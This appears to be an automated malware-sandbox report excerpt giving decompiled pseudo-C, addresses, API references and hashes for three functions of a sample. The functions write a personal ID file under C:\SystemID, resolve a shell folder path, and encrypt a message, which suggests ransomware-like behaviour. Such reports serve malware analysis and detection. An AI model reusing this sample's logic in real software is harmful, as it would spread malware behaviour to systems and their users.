				struct _SECURITY_ATTRIBUTES* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				struct _SECURITY_ATTRIBUTES* _v56;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t77;
				intOrPtr _t79;
				signed int _t86;
				void* _t92;
				void* _t95;
				void* _t96;
				signed int _t98;
				struct _SECURITY_ATTRIBUTES** _t101;
				DWORD* _t109;
				void* _t117;
				signed int _t121;
				intOrPtr _t123;
				intOrPtr* _t126;
				signed int _t127;
				signed int _t128;
				signed int _t138;
				intOrPtr _t141;
				signed int _t142;
				signed int _t143;
				intOrPtr _t144;
				signed int _t146;
				signed int _t147;
				signed int _t150;
				intOrPtr _t151;
				void* _t153;
				void* _t155;
				void* _t156;

				_push(0xffffffff);
				_push(0x4ca7b8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t151;
				_v8 = 0;
				_t121 = 0;
				_t138 = 0;
				_v32 = 0;
				_t141 = 0;
				_v28 = 0;
				_v24 = 0;
				_v8 = 1;
				_t77 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "r");
				_t153 = _t151 - 0x130 + 8;
				_v20 = _t77;
				if(_t77 == 0) {
					L28:
					_t142 = _t121;
					if(_t121 == _t138) {
						L32:
						CreateDirectoryW(L"C:\\SystemID", 0);
						_t79 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "w");
						_t153 = _t153 + 8;
						_v20 = _t79;
						if(_t79 != 0) {
							_t143 = _t121;
							__eflags = _t121 - _t138;
							if(_t121 == _t138) {
								L47:
								__eflags = _a24 - 8;
								_t144 = _v20;
								_t81 =  >=  ? _a4 :  &_a4;
								_push(_t144);
								_push( >=  ? _a4 :  &_a4);
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144);
								_push("\n");
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144);
								_t79 = E00423A38(_t121, _t138, _t144, __eflags);
								_t153 = _t153 + 0x14;
								__eflags = _t121;
								if(_t121 == 0) {
									L54:
									if(_a24 >= 8) {
										_t79 = L00422587(_a4);
									}
									 *[fs:0x0] = _v16;
									return _t79;
								}
								_t146 = _t121;
								__eflags = _t121 - _t138;
								if(_t121 == _t138) {
									L53:
									_t79 = L00422587(_t121);
									_t153 = _t153 + 4;
									goto L54;
								}
								do {
									__eflags =  *((intOrPtr*)(_t146 + 0x14)) - 8;
									if( *((intOrPtr*)(_t146 + 0x14)) >= 8) {
										L00422587( *_t146);
										_t153 = _t153 + 4;
									}
									 *((intOrPtr*)(_t146 + 0x14)) = 7;
									 *(_t146 + 0x10) = 0;
									 *_t146 = 0;
									_t146 = _t146 + 0x18;
									__eflags = _t146 - _t138;
								} while (_t146 != _t138);
								goto L53;
							}
							_t123 = _v20;
							do {
								__eflags =  *((intOrPtr*)(_t143 + 0x14)) - 8;
								if(__eflags < 0) {
									_t86 = _t143;
								} else {
									_t86 =  *_t143;
								}
								_push(_t123);
								_push(_t86);
								E004228FD(_t123, _t135, _t138, _t143, __eflags);
								_t143 = _t143 + 0x18;
								_t153 = _t153 + 8;
								__eflags = _t143 - _t138;
							} while (_t143 != _t138);
							_t121 = _v32;
							goto L47;
						}
						L33:
						if(_t121 == 0) {
							goto L54;
						}
						_t147 = _t121;
						if(_t121 == _t138) {
							goto L53;
						}
						do {
							if( *((intOrPtr*)(_t147 + 0x14)) >= 8) {
								L00422587( *_t147);
								_t153 = _t153 + 4;
							}
							 *((intOrPtr*)(_t147 + 0x14)) = 7;
							 *(_t147 + 0x10) = 0;
							 *_t147 = 0;
							_t147 = _t147 + 0x18;
						} while (_t147 != _t138);
						goto L53;
					}
					while(1) {
						_t91 =  >=  ? _a4 :  &_a4;
						_t79 = E00414C60(_t142,  >=  ? _a4 :  &_a4, 0, _a20);
						if(_t79 != 0xffffffff) {
							goto L33;
						}
						_t142 = _t142 + 0x18;
						if(_t142 != _t138) {
							continue;
						}
						goto L32;
					}
					goto L33;
				}
				_t92 = E00420546(_t77);
				_t155 = _t153 + 4;
				_t158 = _t92;
				if(_t92 != 0) {
					L27:
					_push(_v20);
					E00423A38(_t121, _t138, _t141, _t166);
					_t153 = _t155 + 4;
					goto L28;
				} else {
					do {
						_push(_v20);
						_push(0x7e);
						_push( &_v316);
						_t95 = E00421101(_t121, _t138, _t141, _t158);
						_t156 = _t155 + 0xc;
						if(_t95 == 0) {
							goto L26;
						}
						_v36 = 7;
						_v40 = 0;
						_v56 = 0;
						if(_v316 != 0) {
							_t126 =  &_v316;
							_t135 = _t126 + 2;
							do {
								_t98 =  *_t126;
								_t126 = _t126 + 2;
								__eflags = _t98;
							} while (_t98 != 0);
							_t127 = _t126 - _t135;
							__eflags = _t127;
							_t128 = _t127 >> 1;
							goto L9;
						} else {
							_t128 = 0;
							L9:
							_push(_t128);
							_t129 =  &_v56;
							E00415C10(_t121,  &_v56, _t138, _t141,  &_v316);
							_t101 =  &_v56;
							_v8 = 2;
							if(_t101 >= _t138 || _t121 > _t101) {
								__eflags = _t138 - _t141;
								if(_t138 == _t141) {
									E00414F70(_t121,  &_v32, _t138, _t129);
									_t138 = _v28;
									_t121 = _v32;
								}
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)(_t138 + 0x14)) = 7;
									 *(_t138 + 0x10) = 0;
									 *_t138 = 0;
									__eflags = _v36 - 8;
									if(_v36 >= 8) {
										 *_t138 = _v56;
										_v56 = 0;
									} else {
										_t109 =  &(_v40->nLength);
										__eflags = _t109;
										if(_t109 != 0) {
											E004205A0(_t138,  &_v56, _t109 + _t109);
											_t156 = _t156 + 0xc;
										}
									}
									 *(_t138 + 0x10) = _v40;
									 *((intOrPtr*)(_t138 + 0x14)) = _v36;
									__eflags = 0;
									_v36 = 7;
									_v40 = 0;
									_v56 = 0;
								}
							} else {
								_t132 = _t101 - _t121;
								_t135 = 0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2;
								_t150 = (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2);
								if(_t138 == _v24) {
									E00414F70(_t121,  &_v32, _t138, _t132);
									_t138 = _v28;
									_t121 = _v32;
								}
								_t117 = _t121 + (_t150 + _t150 * 2) * 8;
								if(_t138 != 0) {
									E00413160(_t138, _t117);
								}
							}
							_t138 = _t138 + 0x18;
							_v8 = 1;
							_v28 = _t138;
							if(_v36 >= 8) {
								L00422587(_v56);
								_t156 = _t156 + 4;
							}
							_t141 = _v24;
						}
						L26:
						_t96 = E00420546(_v20);
						_t155 = _t156 + 4;
						_t166 = _t96;
					} while (_t96 == 0);
					goto L27;
				}
			}

0x0040c743
0x0040c745
0x0040c750
0x0040c751
0x0040c761
0x0040c768
0x0040c76a
0x0040c76c
0x0040c76f
0x0040c771
0x0040c774
0x0040c781
0x0040c785
0x0040c78a
0x0040c78d
0x0040c792
0x0040c911
0x0040c911
0x0040c915
0x0040c944
0x0040c94b
0x0040c95b
0x0040c960
0x0040c963
0x0040c968
0x0040c9af
0x0040c9b1
0x0040c9b3
0x0040c9d8
0x0040c9d8
0x0040c9df
0x0040c9e2
0x0040c9e6
0x0040c9e7
0x0040c9e8
0x0040c9ed
0x0040c9ee
0x0040c9f3
0x0040c9f8
0x0040c9f9
0x0040c9fe
0x0040ca01
0x0040ca03
0x0040ca43
0x0040ca47
0x0040ca4c
0x0040ca51
0x0040ca59
0x0040ca64
0x0040ca64
0x0040ca05
0x0040ca07
0x0040ca09
0x0040ca3a
0x0040ca3b
0x0040ca40
0x00000000
0x0040ca40
0x0040ca10
0x0040ca10
0x0040ca14
0x0040ca18
0x0040ca1d
0x0040ca1d
0x0040ca22
0x0040ca29
0x0040ca30
0x0040ca33
0x0040ca36
0x0040ca36
0x00000000
0x0040ca10
0x0040c9b5
0x0040c9b8
0x0040c9b8
0x0040c9bc
0x0040c9c2
0x0040c9be
0x0040c9be
0x0040c9be
0x0040c9c4
0x0040c9c5
0x0040c9c6
0x0040c9cb
0x0040c9ce
0x0040c9d1
0x0040c9d1
0x0040c9d5
0x00000000
0x0040c9d5
0x0040c96a
0x0040c96c
0x00000000
0x00000000
0x0040c972
0x0040c976
0x00000000
0x00000000
0x0040c980
0x0040c984
0x0040c988
0x0040c98d
0x0040c98d
0x0040c992
0x0040c999
0x0040c9a0
0x0040c9a3
0x0040c9a6
0x00000000
0x0040c9aa
0x0040c920
0x0040c92c
0x0040c933
0x0040c93b
0x00000000
0x00000000
0x0040c93d
0x0040c942
0x00000000
0x00000000
0x00000000
0x0040c942
0x00000000
0x0040c920
0x0040c799
0x0040c79e
0x0040c7a1
0x0040c7a3
0x0040c906
0x0040c906
0x0040c909
0x0040c90e
0x00000000
0x0040c7b0
0x0040c7b0
0x0040c7b0
0x0040c7b9
0x0040c7bb
0x0040c7bc
0x0040c7c1
0x0040c7c6
0x00000000
0x00000000
0x0040c7ce
0x0040c7d5
0x0040c7dc
0x0040c7e7
0x0040c7ed
0x0040c7f3
0x0040c7f6
0x0040c7f6
0x0040c7f9
0x0040c7fc
0x0040c7fc
0x0040c801
0x0040c801
0x0040c803
0x00000000
0x0040c7e9
0x0040c7e9
0x0040c805
0x0040c805
0x0040c80d
0x0040c810
0x0040c815
0x0040c818
0x0040c81e
0x0040c861
0x0040c863
0x0040c869
0x0040c86e
0x0040c871
0x0040c871
0x0040c874
0x0040c876
0x0040c87a
0x0040c881
0x0040c888
0x0040c88b
0x0040c88f
0x0040c8ac
0x0040c8ae
0x0040c891
0x0040c894
0x0040c894
0x0040c895
0x0040c89f
0x0040c8a4
0x0040c8a4
0x0040c895
0x0040c8b8
0x0040c8be
0x0040c8c1
0x0040c8c3
0x0040c8ca
0x0040c8d1
0x0040c8d1
0x0040c824
0x0040c82b
0x0040c82f
0x0040c837
0x0040c83c
0x0040c842
0x0040c847
0x0040c84a
0x0040c84a
0x0040c850
0x0040c855
0x0040c85a
0x0040c85a
0x0040c855
0x0040c8d5
0x0040c8d8
0x0040c8e0
0x0040c8e3
0x0040c8e8
0x0040c8ed
0x0040c8ed
0x0040c8f0
0x0040c8f0
0x0040c8f3
0x0040c8f6
0x0040c8fb
0x0040c8fe
0x0040c8fe
0x00000000
0x0040c7b0

APIs

Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8

_fgetws.LIBCMT ref: 0040C7BC
_memmove.LIBCMT ref: 0040C89F
CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C77C, 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CreateDirectory__wfsopen_fgetws_memmove
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2864494435-54166481
Opcode ID: cd2d1ebaeb73b000566b27407120cf5776c271d9576cf7e4bfe0b84696e73251
Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
Opcode Fuzzy Hash: cd2d1ebaeb73b000566b27407120cf5776c271d9576cf7e4bfe0b84696e73251
Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040F310(void* __edi, void* __esi, char _a4, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v56;
				intOrPtr _v60;
				signed int _v64;
				short _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v104;
				void* __ebx;
				void* __ebp;
				_Unknown_base(*)()* _t147;
				void* _t169;
				void* _t173;
				void* _t177;
				void* _t195;
				void* _t203;
				struct HINSTANCE__* _t221;
				signed int _t222;
				void* _t233;
				void* _t235;
				signed int _t238;
				short _t260;
				char _t261;
				intOrPtr _t266;
				void* _t267;
				void* _t268;
				void* _t269;

				_push(0xffffffff);
				_push(0x4caa98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t266;
				_t267 = _t266 - 0x58;
				_v8 = 0;
				_t221 = LoadLibraryW(L"Shell32.dll");
				if(_t221 != 0) {
					_t147 = GetProcAddress(_t221, "SHGetFolderPathW");
					_t259 = _t147;
					E00413A90(_t221,  &_v32, __edi, 0x400);
					_v8 = 1;
					_t254 = _v32;
					 *_t147(0, 0x28, 0, 0, _v32, __edi, __esi);
					_push(_v20);
					_v36 = 7;
					_v40 = 0;
					_v56 = 0;
					E00418400( &_v56, _v32, _v28);
					_v8 = 2;
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t147, "\\");
					_v8 = 3;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t147, "/");
					_v8 = 4;
					E0040F2B0( &_v56,  &_v80,  &_v104);
					_t268 = _t267 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t268 = _t268 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t268 = _t268 + 4;
					}
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t259, "\\");
					_v8 = 5;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t259, "/");
					_v8 = 6;
					E0040F2B0( &_a4,  &_v80,  &_v104);
					_t269 = _t268 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t269 = _t269 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t269 = _t269 + 4;
					}
					_t260 = _v56;
					_t167 =  >=  ? _t260 :  &_v56;
					_t233 =  >=  ? _t260 :  &_v56;
					_v20 =  >=  ? _t260 :  &_v56;
					_t250 =  >=  ? _t260 :  &_v56;
					_t169 = _t233 + _v40 * 2;
					__eflags = ( >=  ? _t260 :  &_v56) - _t169;
					if(( >=  ? _t260 :  &_v56) != _t169) {
						_push(_t233);
						E00418380( &_v20, _t250, _t169, _v20);
						_t269 = _t269 + 0xc;
					}
					_t261 = _a4;
					_t171 =  >=  ? _t261 :  &_a4;
					_t235 =  >=  ? _t261 :  &_a4;
					_v20 =  >=  ? _t261 :  &_a4;
					_t252 =  >=  ? _t261 :  &_a4;
					_t173 = _t235 + _a20 * 2;
					__eflags = ( >=  ? _t261 :  &_a4) - _t173;
					if(( >=  ? _t261 :  &_a4) != _t173) {
						_push(_t235);
						E00418380( &_v20, _t252, _t173, _v20);
						_t269 = _t269 + 0xc;
					}
					_t267 = _t269 - 8;
					_v20 = 0x5c;
					if(E00414D40( &_v56,  &_v20) != 0xffffffff) {
						_t177 = E00413520( &_v56,  &_v104, 0, _t175);
						_t262 = _t177;
						if( &_v56 != _t177) {
							if(_v36 >= 8) {
								L00422587(_v56);
								_t267 = _t267 + 4;
							}
							_v36 = 7;
							_v40 = 0;
							_v56 = 0;
							E004145A0( &_v56, _t262);
						}
						if(_v84 >= 8) {
							L00422587(_v104);
							_t267 = _t267 + 4;
						}
						_t238 = _v40;
						_t180 =  >=  ? _v56 :  &_v56;
						if( *((short*)(( >=  ? _v56 :  &_v56) + _t238 * 2 - 2)) == 0x5c) {
							_t97 = _t238 - 1; // -1
							_t203 = E00413520( &_v56,  &_v104, 0, _t97);
							_t265 = _t203;
							if( &_v56 != _t203) {
								if(_v36 >= 8) {
									L00422587(_v56);
									_t267 = _t267 + 4;
								}
								_v36 = 7;
								_v40 = 0;
								_v56 = 0;
								E004145A0( &_v56, _t265);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						_t239 = _a20;
						_t182 =  >=  ? _a4 :  &_a4;
						if( *((short*)(( >=  ? _a4 :  &_a4) + _a20 * 2 - 2)) == 0x5c) {
							_t239 =  &_a4;
							_t195 = E00413520( &_a4,  &_v104, 0,  &_a4 - 1);
							_t264 = _t195;
							if( &_a4 != _t195) {
								if(_a24 >= 8) {
									L00422587(_a4);
									_t267 = _t267 + 4;
								}
								_a24 = 7;
								_t239 =  &_a4;
								_a20 = 0;
								_a4 = 0;
								E004145A0( &_a4, _t264);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						FreeLibrary(_t221);
						_t185 =  >=  ? _a4 :  &_a4;
						_t222 = _t221 & 0xffffff00 | E00417F00( &_v56, _t239, _v40,  >=  ? _a4 :  &_a4, _a20) == 0x00000000;
					} else {
						FreeLibrary(_t221);
						_t222 = 0;
					}
					if(_v36 >= 8) {
						L00422587(_v56);
						_t267 = _t267 + 4;
					}
					_v36 = 7;
					_v56 = 0;
					_t188 = _v32;
					_v40 = 0;
					if(_v32 != 0) {
						L00422587(_t188);
						_t267 = _t267 + 4;
					}
					goto L41;
				} else {
					_t222 = 0;
					L41:
					if(_a24 >= 8) {
						L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t222;
				}
			}

0x0040f313
0x0040f315
0x0040f320
0x0040f321
0x0040f328
0x0040f331
0x0040f33e
0x0040f342
0x0040f353
0x0040f361
0x0040f363
0x0040f368
0x0040f36c
0x0040f378
0x0040f37a
0x0040f37f
0x0040f38c
0x0040f394
0x0040f398
0x0040f39d
0x0040f3a4
0x0040f3a8
0x0040f3b4
0x0040f3bb
0x0040f3bf
0x0040f3c4
0x0040f3cb
0x0040f3cf
0x0040f3db
0x0040f3e2
0x0040f3e6
0x0040f3ee
0x0040f3f9
0x0040f3fe
0x0040f405
0x0040f40a
0x0040f40f
0x0040f40f
0x0040f414
0x0040f41c
0x0040f423
0x0040f42a
0x0040f42e
0x0040f433
0x0040f438
0x0040f438
0x0040f43b
0x0040f43f
0x0040f44e
0x0040f455
0x0040f459
0x0040f45e
0x0040f465
0x0040f469
0x0040f475
0x0040f47c
0x0040f480
0x0040f488
0x0040f493
0x0040f498
0x0040f49f
0x0040f4a4
0x0040f4a9
0x0040f4a9
0x0040f4ae
0x0040f4b6
0x0040f4bd
0x0040f4c4
0x0040f4c8
0x0040f4cd
0x0040f4d2
0x0040f4d2
0x0040f4db
0x0040f4e7
0x0040f4ea
0x0040f4ed
0x0040f4f0
0x0040f4f6
0x0040f4f9
0x0040f4fb
0x0040f4fd
0x0040f505
0x0040f50a
0x0040f50a
0x0040f513
0x0040f51f
0x0040f522
0x0040f525
0x0040f528
0x0040f52e
0x0040f531
0x0040f533
0x0040f535
0x0040f53d
0x0040f542
0x0040f542
0x0040f545
0x0040f548
0x0040f55e
0x0040f578
0x0040f57d
0x0040f584
0x0040f58a
0x0040f58f
0x0040f594
0x0040f594
0x0040f599
0x0040f5a4
0x0040f5ab
0x0040f5af
0x0040f5af
0x0040f5b8
0x0040f5bd
0x0040f5c2
0x0040f5c2
0x0040f5cc
0x0040f5cf
0x0040f5d9
0x0040f5db
0x0040f5e8
0x0040f5ed
0x0040f5f4
0x0040f5fa
0x0040f5ff
0x0040f604
0x0040f604
0x0040f609
0x0040f614
0x0040f61b
0x0040f61f
0x0040f61f
0x0040f628
0x0040f62d
0x0040f632
0x0040f632
0x0040f628
0x0040f63c
0x0040f63f
0x0040f649
0x0040f655
0x0040f658
0x0040f65d
0x0040f664
0x0040f66a
0x0040f66f
0x0040f674
0x0040f674
0x0040f679
0x0040f681
0x0040f684
0x0040f68b
0x0040f68f
0x0040f68f
0x0040f698
0x0040f69d
0x0040f6a2
0x0040f6a2
0x0040f698
0x0040f6a6
0x0040f6b6
0x0040f6c9
0x0040f560
0x0040f561
0x0040f567
0x0040f567
0x0040f6d2
0x0040f6d7
0x0040f6dc
0x0040f6dc
0x0040f6e1
0x0040f6e8
0x0040f6ec
0x0040f6ef
0x0040f6f8
0x0040f6fb
0x0040f700
0x0040f700
0x00000000
0x0040f344
0x0040f344
0x0040f703
0x0040f707
0x0040f70c
0x0040f711
0x0040f71a
0x0040f724
0x0040f724

APIs

LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353

Strings

SHGetFolderPathW, xrefs: 0040F34D
Shell32.dll, xrefs: 0040F32C
\, xrefs: 0040F548

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetFolderPathW$Shell32.dll$\
API String ID: 2574300362-2555811374
Opcode ID: 29df590b87079fe373604ab2510f8e0d2be2aa40337168becaf5725ce843f379
Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
Opcode Fuzzy Hash: 29df590b87079fe373604ab2510f8e0d2be2aa40337168becaf5725ce843f379
Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040CBA0(intOrPtr* __ecx, void* __eflags, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v1124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t127;
				intOrPtr _t129;
				void* _t150;
				void* _t172;
				void* _t173;
				void* _t176;
				void* _t178;
				intOrPtr _t179;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t189;
				void* _t191;

				_push(0xffffffff);
				_push(0x4ca818);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t179;
				_push(_t150);
				_push(_t172);
				_v100 = __ecx;
				_push(0xffffffff);
				_v8 = 1;
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				E00413FF0(_t150,  &_v92,  &_a28, 0);
				_v8 = 2;
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "\n");
				_v8 = 3;
				_push(3);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\\\n");
				_v8 = 4;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t181 = _t179 - 0x458 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t181 = _t181 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t181 = _t181 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, " ");
				_v8 = 5;
				_push(6);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "&#160;");
				_v8 = 6;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t182 = _t181 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t182 = _t182 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t182 = _t182 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "/");
				_v8 = 7;
				_push(2);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\/");
				_v8 = 8;
				_t171 =  &_v44;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t183 = _t182 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t183 = _t183 + 4;
				}
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t183 = _t183 + 4;
				}
				_v20 = E00451D30();
				E0044F960(_t150, _t171, E00452510());
				_t120 =  >=  ? _v92 :  &_v92;
				_t151 = E004524A0(_t178,  >=  ? _v92 :  &_v92, _v76);
				E00452ED0(_t121,  &_v20, 0, 0);
				_t185 = _t183 + 0x1c;
				if(E00450960(_t151, _t171, _v72 - 0x10) == 0) {
					_t176 = E00420C62(_t151, _t171, _t172, E004527A0(_t171, __eflags, _v20));
					_t127 = E00420C62(_t151, _t171, _t172, 0x82);
					__eflags = _a24 - 0x10;
					_t173 = _t127;
					_t165 =  >=  ? _a4 :  &_a4;
					_t129 = _a20 + 1;
					_push(4);
					_push(_v20);
					_push(_t176);
					_push( >=  ? _a4 :  &_a4);
					E004525F0(_t129);
					_t189 = _t185 + 0x20;
					_v96 = _t129;
					__eflags = _t129 - 0xffffffff;
					if(_t129 != 0xffffffff) {
						E0044F5E0(_t151);
						E00451A60(_t171, _t178, _v20);
						_t191 = _t189 + 8;
						 *_v100 = _v96;
					} else {
						E00451FB0(_t151, _t173);
						E00450670(E00450960(_t151, _t171, __eflags), _t173);
						_push(_t173);
						_push("Error encrypting message: %s\n");
						_push(E00420E4D() + 0x40);
						E00422408(_t151, _t173, _t176, __eflags);
						_t191 = _t189 + 0x14;
						_t176 = 0;
					}
				} else {
					E00450670(_t124,  &_v1124);
					_t191 = _t185 + 8;
					_t176 = 0;
				}
				if(_v72 >= 0x10) {
					L00422587(_v92);
					_t191 = _t191 + 4;
				}
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				if(_a24 >= 0x10) {
					L00422587(_a4);
					_t191 = _t191 + 4;
				}
				_a24 = 0xf;
				_a20 = 0;
				_a4 = 0;
				if(_a48 >= 0x10) {
					L00422587(_a28);
				}
				 *[fs:0x0] = _v16;
				return _t176;
			}

0x0040cba3
0x0040cba5
0x0040cbb0
0x0040cbb1
0x0040cbbe
0x0040cbc0
0x0040cbc1
0x0040cbc4
0x0040cbc6
0x0040cbd6
0x0040cbdd
0x0040cbe4
0x0040cbe8
0x0040cbed
0x0040cbf4
0x0040cbfb
0x0040cc02
0x0040cc09
0x0040cc0d
0x0040cc12
0x0040cc19
0x0040cc20
0x0040cc27
0x0040cc2e
0x0040cc32
0x0040cc3a
0x0040cc45
0x0040cc4a
0x0040cc51
0x0040cc56
0x0040cc5b
0x0040cc5b
0x0040cc5e
0x0040cc66
0x0040cc6d
0x0040cc74
0x0040cc78
0x0040cc7d
0x0040cc82
0x0040cc82
0x0040cc85
0x0040cc8f
0x0040cc96
0x0040cc9d
0x0040cca1
0x0040cca6
0x0040ccad
0x0040ccb4
0x0040ccbb
0x0040ccc2
0x0040ccc6
0x0040ccce
0x0040ccd9
0x0040ccde
0x0040cce5
0x0040ccea
0x0040ccef
0x0040ccef
0x0040ccf2
0x0040ccfa
0x0040cd01
0x0040cd08
0x0040cd0c
0x0040cd11
0x0040cd16
0x0040cd16
0x0040cd19
0x0040cd23
0x0040cd2a
0x0040cd31
0x0040cd35
0x0040cd3a
0x0040cd41
0x0040cd48
0x0040cd4f
0x0040cd56
0x0040cd5a
0x0040cd62
0x0040cd67
0x0040cd6d
0x0040cd72
0x0040cd79
0x0040cd7e
0x0040cd83
0x0040cd83
0x0040cd8a
0x0040cd91
0x0040cd98
0x0040cd9c
0x0040cda1
0x0040cda6
0x0040cda6
0x0040cdae
0x0040cdb7
0x0040cdc6
0x0040cdd5
0x0040cdde
0x0040cde3
0x0040cded
0x0040ce1a
0x0040ce21
0x0040ce2c
0x0040ce30
0x0040ce35
0x0040ce39
0x0040ce3a
0x0040ce3c
0x0040ce3f
0x0040ce40
0x0040ce42
0x0040ce47
0x0040ce4a
0x0040ce4d
0x0040ce50
0x0040ce82
0x0040ce8d
0x0040ce95
0x0040ce9b
0x0040ce52
0x0040ce52
0x0040ce5e
0x0040ce66
0x0040ce67
0x0040ce74
0x0040ce75
0x0040ce7a
0x0040ce7d
0x0040ce7d
0x0040cdef
0x0040cdf7
0x0040cdfc
0x0040cdff
0x0040cdff
0x0040cea1
0x0040cea6
0x0040ceab
0x0040ceab
0x0040ceb2
0x0040ceb9
0x0040cec0
0x0040cec4
0x0040cec9
0x0040cece
0x0040cece
0x0040ced5
0x0040cedc
0x0040cee3
0x0040cee7
0x0040ceec
0x0040cef1
0x0040cefb
0x0040cf06

APIs

__except_handler4.MSVCRT ref: 0040CDDE
_malloc.LIBCMT ref: 0040CE12
